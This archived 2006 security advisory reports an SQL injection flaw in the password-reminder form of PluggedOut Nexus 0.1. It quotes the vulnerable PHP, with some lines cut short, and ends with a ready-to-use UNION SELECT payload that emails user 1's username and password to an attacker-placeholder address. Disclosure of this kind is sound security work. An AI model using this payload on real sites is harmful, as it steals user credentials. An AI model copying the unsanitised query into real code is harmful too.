Type packetstorm
Reporter Hamid Ebadi
Modified 2006-03-03T00:00:00


                                            `PluggedOut Nexus SQL injection  
Nexus is an open source script you can run on your web  
server to give you a community based website  
where people can register, search each others  
interests, and communicate with one another either  
through a private messaging system, or via chat  
requests and forums.  
Project : PluggedOut Nexus  
Version : 0.1  
Author : Jonathan Beckett  
Home :  
The information has been provided by Hamid Ebadi .  
( Hamid Network Security Team): admin[AT]hamid[o]ir  
The original article can be found at:  
Vulnerable Systems:PluggedOut Nexus 0.1  
in this address If you fill the private email address  
that you used while creating your account into the  
form , the server will send you an email to that  
address with your login details  
Input passed to the "email" parameter in  
"forgotten_password.php" isn't properly sanitised  
before being used in a SQL query. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
in E-Mail Address form enter ' and press Send Request   
you will redirect to  
http://localhost/Nexus/site_problem.php and see :  
Problem with Nexus website  
A problem has occurred with the Nexus website - this  
was not your fault, and the administrators probably  
already know about it.  
Vulnerable Code: The following lines in  
"forgotten_password.php" :  
if ($_POST["submit"]!=""){  
$con = db_connect();  
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM  
nexus_users WHERE  
$result = mysql_query($sql,$con);  
if ($result!=false){  
if (mysql_num_rows($result)>0){  
$row = mysql_fetch_array($result);  
$from = $site_admin_email;  
$to = $row["cEMailPrivate"];  
$subject = "Reminder Username/Password from  
$body = "This email has been sent following a  
request for a reminder username/password in the  
".$site_long_name." website.\n\n"  
."Your account details are as follows;\n"  
." Username : ".$row["cUsername"]."\n"  
." Password : ".$row["cPassword"]."\n\n"  
."If you did not request this reminder message,  
please contact the ".$site_long_name." administrator  
insert this code in E-Mail Address form  
(http://localhost/Nexus/forgotten_password.php) :  
hamidnetworksecurityteam' union select  
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from  
nexus_users WHERE nUserId=1 and '1'='1  
and ATTACKER@EMAIL.ADDRESS recieve email contain  
username & password for userID=1 .   
Do You Yahoo!?  
Tired of spam? Yahoo! Mail has the best spam protection around